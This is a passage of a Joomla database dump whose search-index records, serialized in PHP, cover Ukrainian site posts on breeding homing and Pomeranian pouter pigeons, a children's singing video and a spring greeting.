class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/SEoWuQ7uqVI\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-02-20 17:01:50\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"1\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"головна\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:40:\"2502:krashchi-vistupi-ditej-v-golos-diti\";s:7:\"catslug\";s:10:\"8:novini-2\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:62:\"/index.php/8-novini-2/2502-krashchi-vistupi-ditej-v-golos-diti\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"головна\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"головна\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2502\";s:5:\"route\";s:93:\"index.php?option=com_content&view=article&id=2502:krashchi-vistupi-ditej-v-golos-diti&catid=8\";s:5:\"title\";s:60:\"Кращі виступи дітей в Голос Діти \";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-02-20 17:01:50\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-02-20 17:01:50\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4806,'index.php?option=com_content&view=article&id=2503','index.php?option=com_content&view=article&id=2503:pidrostayut-molodi-poshtovi-goduyu-vruchnu-vzhe-3-bereznya-2021-roku&catid=126','Підростають молоді поштові - годую вручну, вже 3 березня 2021 року ',' ','2021-03-05 18:47:27','d002eb85aac070a7dddb0e322a029bb5',1,1,1,'*','2021-03-05 16:47:13','0000-00-00 00:00:00','2021-03-05 16:47:13','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2503\";s:5:\"alias\";s:68:\"pidrostayut-molodi-poshtovi-goduyu-vruchnu-vzhe-3-bereznya-2021-roku\";s:7:\"summary\";s:297:\"	<p><span class=\"f-video-editor fr-fvn\" contenteditable=\"false\"><iframe allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture\" allowfullscreen=\"\" frameborder=\"0\" height=\"315\" src=\"https://www.youtube.com/embed/IVisotsY5Xw\" width=\"560\"></iframe></span></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"126\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-03-05 16:47:27\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:14:\"Поштові\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:73:\"2503:pidrostayut-molodi-poshtovi-goduyu-vruchnu-vzhe-3-bereznya-2021-roku\";s:7:\"catslug\";s:12:\"126:poshtovi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:100:\"/index.php/holuby/poshtovi/2503-pidrostayut-molodi-poshtovi-goduyu-vruchnu-vzhe-3-bereznya-2021-roku\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:14:\"Поштові\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:14:\"Поштові\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2503\";s:5:\"route\";s:128:\"index.php?option=com_content&view=article&id=2503:pidrostayut-molodi-poshtovi-goduyu-vruchnu-vzhe-3-bereznya-2021-roku&catid=126\";s:5:\"title\";s:116:\"Підростають молоді поштові - годую вручну, вже 3 березня 2021 року \";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-03-05 16:47:13\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-03-05 16:47:13\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4808,'index.php?option=com_content&view=article&id=2504','index.php?option=com_content&view=article&id=2504:pochinaetsya-masove-budivnitstvo-gnizd&catid=136','Починається масове будівництво гнізд ',' ','2021-03-05 19:01:19','bd57b326ddcf0ddb39f7dd278e7fb303',1,1,1,'*','2021-03-05 17:01:10','0000-00-00 00:00:00','2021-03-05 17:01:10','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2504\";s:5:\"alias\";s:38:\"pochinaetsya-masove-budivnitstvo-gnizd\";s:7:\"summary\";s:423:\"	<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/IMG_20210305_103303.jpg\"><img src=\"https://malehus.in.ua/images/stories/IMG_20210305_103303.jpg\" alt=\"\" class=\"fr-fil fr-dib\" width=\"747\"></a></p><p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/IMG_20210305_093837.jpg\"><img src=\"https://malehus.in.ua/images/stories/IMG_20210305_093837.jpg\" alt=\"\" class=\"fr-fil fr-dib\" width=\"742\"></a><br></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:3:\"136\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-03-05 17:01:19\";s:11:\"modified_by\";s:3:\"430\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"show_category_heading_title_text\";s:1:\"1\";s:19:\"show_category_title\";s:1:\"0\";s:16:\"show_description\";s:1:\"0\";s:22:\"show_description_image\";s:1:\"0\";s:8:\"maxLevel\";s:1:\"1\";s:21:\"show_empty_categories\";s:1:\"0\";s:16:\"show_no_articles\";s:1:\"1\";s:16:\"show_subcat_desc\";s:1:\"1\";s:21:\"show_cat_num_articles\";s:1:\"0\";s:13:\"show_cat_tags\";s:1:\"1\";s:21:\"show_base_description\";s:1:\"1\";s:11:\"maxLevelcat\";s:2:\"-1\";s:25:\"show_empty_categories_cat\";s:1:\"0\";s:20:\"show_subcat_desc_cat\";s:1:\"1\";s:25:\"show_cat_num_articles_cat\";s:1:\"1\";s:20:\"num_leading_articles\";s:1:\"1\";s:18:\"num_intro_articles\";s:1:\"6\";s:11:\"num_columns\";s:1:\"1\";s:9:\"num_links\";s:1:\"0\";s:18:\"multi_column_order\";s:1:\"0\";s:24:\"show_subcategory_content\";s:1:\"0\";s:21:\"show_pagination_limit\";s:1:\"1\";s:12:\"filter_field\";s:4:\"hide\";s:13:\"show_headings\";s:1:\"1\";s:14:\"list_show_date\";s:1:\"0\";s:11:\"date_format\";s:0:\"\";s:14:\"list_show_hits\";s:1:\"1\";s:16:\"list_show_author\";s:1:\"0\";s:15:\"list_show_votes\";s:1:\"0\";s:17:\"list_show_ratings\";s:1:\"0\";s:11:\"orderby_pri\";s:5:\"order\";s:11:\"orderby_sec\";s:5:\"rdate\";s:10:\"order_date\";s:9:\"published\";s:15:\"show_pagination\";s:1:\"1\";s:23:\"show_pagination_results\";s:1:\"1\";s:13:\"show_featured\";s:4:\"show\";s:14:\"show_feed_link\";s:1:\"1\";s:12:\"feed_summary\";s:1:\"0\";s:18:\"feed_show_readmore\";s:1:\"1\";s:12:\"sef_advanced\";i:0;s:7:\"sef_ids\";i:0;s:20:\"custom_fields_enable\";s:1:\"1\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"metakey\";s:0:\"\";s:8:\"metadesc\";s:0:\"\";s:8:\"metadata\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":4:{s:6:\"robots\";s:0:\"\";s:6:\"author\";s:0:\"\";s:6:\"rights\";s:0:\"\";s:10:\"xreference\";s:0:\"\";}s:14:\"\0*\0initialized\";b:1;s:9:\"separator\";s:1:\".\";}s:7:\"version\";s:1:\"2\";s:8:\"ordering\";s:1:\"0\";s:8:\"category\";s:35:\"Померанські дутиші\";s:9:\"cat_state\";s:1:\"1\";s:10:\"cat_access\";s:1:\"1\";s:4:\"slug\";s:43:\"2504:pochinaetsya-masove-budivnitstvo-gnizd\";s:7:\"catslug\";s:22:\"136:pomeranski-dutyshi\";s:6:\"author\";s:10:\"Super User\";s:6:\"layout\";s:7:\"article\";s:7:\"context\";s:19:\"com_content.article\";s:4:\"path\";s:80:\"/index.php/holuby/pomeranski-dutyshi/2504-pochinaetsya-masove-budivnitstvo-gnizd\";s:10:\"metaauthor\";N;}s:15:\"\0*\0instructions\";a:5:{i:1;a:3:{i:0;s:5:\"title\";i:1;s:8:\"subtitle\";i:2;s:2:\"id\";}i:2;a:2:{i:0;s:7:\"summary\";i:1;s:4:\"body\";}i:3;a:8:{i:0;s:4:\"meta\";i:1;s:10:\"list_price\";i:2;s:10:\"sale_price\";i:3;s:7:\"metakey\";i:4;s:8:\"metadesc\";i:5;s:10:\"metaauthor\";i:6;s:6:\"author\";i:7;s:16:\"created_by_alias\";}i:4;a:2:{i:0;s:4:\"path\";i:1;s:5:\"alias\";}i:5;a:1:{i:0;s:8:\"comments\";}}s:11:\"\0*\0taxonomy\";a:4:{s:4:\"Type\";a:1:{s:7:\"Article\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:7:\"Article\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:6:\"Author\";a:1:{s:10:\"Super User\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:10:\"Super User\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Category\";a:1:{s:35:\"Померанські дутиші\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:35:\"Померанські дутиші\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}s:8:\"Language\";a:1:{s:1:\"*\";O:27:\"Joomla\\CMS\\Object\\CMSObject\":4:{s:10:\"\0*\0_errors\";a:0:{}s:5:\"title\";s:1:\"*\";s:5:\"state\";i:1;s:6:\"access\";i:1;}}}s:3:\"url\";s:49:\"index.php?option=com_content&view=article&id=2504\";s:5:\"route\";s:98:\"index.php?option=com_content&view=article&id=2504:pochinaetsya-masove-budivnitstvo-gnizd&catid=136\";s:5:\"title\";s:70:\"Починається масове будівництво гнізд \";s:11:\"description\";s:1:\" \";s:9:\"published\";N;s:5:\"state\";i:1;s:6:\"access\";s:1:\"1\";s:8:\"language\";s:1:\"*\";s:18:\"publish_start_date\";s:19:\"2021-03-05 17:01:10\";s:16:\"publish_end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"start_date\";s:19:\"2021-03-05 17:01:10\";s:8:\"end_date\";s:19:\"0000-00-00 00:00:00\";s:10:\"list_price\";N;s:10:\"sale_price\";N;s:7:\"type_id\";i:4;s:15:\"defaultLanguage\";s:5:\"uk-UA\";}'),(4809,'index.php?option=com_content&view=article&id=2505','index.php?option=com_content&view=article&id=2505:iz-svyatom-vesni-krasi-ta-lyubovi&catid=8','Із святом весни, краси та любові!',' ','2021-03-05 19:48:04','0a7ec5da4e7201f8b265ba85a11ac586',1,1,1,'*','2021-03-05 17:48:04','0000-00-00 00:00:00','2021-03-05 17:48:04','0000-00-00 00:00:00',0,0,4,_binary 'O:19:\"FinderIndexerResult\":19:{s:11:\"\0*\0elements\";a:26:{s:2:\"id\";s:4:\"2505\";s:5:\"alias\";s:33:\"iz-svyatom-vesni-krasi-ta-lyubovi\";s:7:\"summary\";s:176:\"<p><a class=\"modal\" href=\"https://malehus.in.ua/images/stories/0_0_01.jpg\"><img src=\"https://malehus.in.ua/images/stories/0_0_01.jpg\" alt=\"\" class=\"fr-fin\" width=\"749\"></a></p>\";s:4:\"body\";s:0:\"\";s:6:\"images\";s:173:\"{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}\";s:5:\"catid\";s:1:\"8\";s:10:\"created_by\";s:3:\"430\";s:16:\"created_by_alias\";s:0:\"\";s:8:\"modified\";s:19:\"2021-03-05 17:48:04\";s:11:\"modified_by\";s:1:\"0\";s:6:\"params\";O:24:\"Joomla\\Registry\\Registry\":3:{s:7:\"\0*\0data\";O:8:\"stdClass\":84:{s:14:\"article_layout\";s:9:\"_:default\";s:10:\"show_title\";s:1:\"1\";s:11:\"link_titles\";s:1:\"1\";s:10:\"show_intro\";s:1:\"1\";s:19:\"info_block_position\";s:1:\"0\";s:21:\"info_block_show_title\";s:1:\"1\";s:13:\"show_category\";s:1:\"1\";s:13:\"link_category\";s:1:\"1\";s:20:\"show_parent_category\";s:1:\"1\";s:20:\"link_parent_category\";s:1:\"0\";s:17:\"show_associations\";s:1:\"0\";s:5:\"flags\";s:1:\"1\";s:11:\"show_author\";s:1:\"0\";s:11:\"link_author\";s:1:\"0\";s:16:\"show_create_date\";s:1:\"0\";s:16:\"show_modify_date\";s:1:\"0\";s:17:\"show_publish_date\";s:1:\"1\";s:20:\"show_item_navigation\";s:1:\"1\";s:9:\"show_vote\";s:1:\"0\";s:13:\"show_readmore\";s:1:\"1\";s:19:\"show_readmore_title\";s:1:\"1\";s:14:\"readmore_limit\";s:2:\"80\";s:9:\"show_tags\";s:1:\"1\";s:10:\"show_icons\";s:1:\"1\";s:15:\"show_print_icon\";s:1:\"1\";s:15:\"show_email_icon\";s:1:\"0\";s:9:\"show_hits\";s:1:\"1\";s:11:\"show_noauth\";s:1:\"1\";s:13:\"urls_position\";s:1:\"0\";s:7:\"captcha\";s:1:\"0\";s:23:\"show_publishing_options\";s:1:\"1\";s:20:\"show_article_options\";s:1:\"1\";s:12:\"save_history\";s:1:\"0\";s:13:\"history_limit\";i:10;s:25:\"show_urls_images_frontend\";s:1:\"0\";s:24:\"show_urls_images_backend\";s:1:\"1\";s:7:\"targeta\";i:0;s:7:\"targetb\";i:0;s:7:\"targetc\";i:0;s:11:\"float_intro\";s:4:\"left\";s:14:\"float_fulltext\";s:4:\"left\";s:15:\"category_layout\";s:6:\"_:blog\";s:32:\"